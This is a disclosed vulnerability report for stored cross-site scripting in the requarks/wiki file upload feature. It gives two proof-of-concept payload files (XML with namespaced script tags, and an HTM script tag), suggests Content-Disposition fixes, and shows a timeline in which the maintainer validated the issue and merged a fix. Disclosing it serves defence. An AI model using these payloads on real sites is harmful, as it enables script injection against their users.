Cross-site Scripting (XSS) - Stored in requarks/wiki

Valid

Reported on

Dec 20th 2021


Description

Stored XSS can be performed by malicious XML / HTM files. There is no check in place to prevent such files from being uploaded.

Proof of Concept 1 (XML)

1: Upload the following file as payload.xml:

<html>
        <head></head>
        <body>
                <something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>
                <a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(2)</a:script>
                <info>
                  <name>
                    <value><![CDATA[<script>confirm(document.domain)</script>]]></value>
                  </name>
                    <description>
                      <value>Hello</value>
                    </description>
                    <url>
                      <value>http://google.com</value>
                    </url>
                </info>
        </body>
</html>

Proof of Concept 2 (HTM)

2: Upload the following file as payload.htm:

<script>alert(1)</script>

Impact

This vulnerability is capable of XSS via malicious XML / HTM files

Recommended Fix

Only allow image file uploads (png / html / webp / svg [sanitize this one properly!])

If filetype restriction unallowed, I strongly suggest you opt for Content-Disposition method. As there are many dangerous file types which can be uploaded. I recommend:

  • For select files ( .png, .jpg, .svg (after sanitization) .pdf, .gif ... etc):

  • Use the Content-Disposition: inline header so that they can be viewed in the browser.

  • If the file extension does not match a safe file type

  • Use the Content-Disposition: attachments header so that they are directly downloaded to user computers instead.

Occurrences

Alternative Fix: Serve Content-Disposition: "inline" for a selected filetypes deemed safe and the rest Content-Disposition: "attachments"

We are processing your report and will contact the requarks/wiki team within 24 hours. 6 months ago
haxatron modified the report
6 months ago
haxatron modified the report
6 months ago
We have contacted a member of the requarks/wiki team and are waiting to hear back 6 months ago
haxatron modified the report
6 months ago
We have sent a follow up to the requarks/wiki team. We will try again in 7 days. 6 months ago
Nicolas Giard validated this vulnerability 6 months ago
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
Nicolas Giard confirmed that a fix has been merged on 79bdd4 6 months ago
Nicolas Giard has been awarded the fix bounty
assets.js#L163L220 has been validated
to join this conversation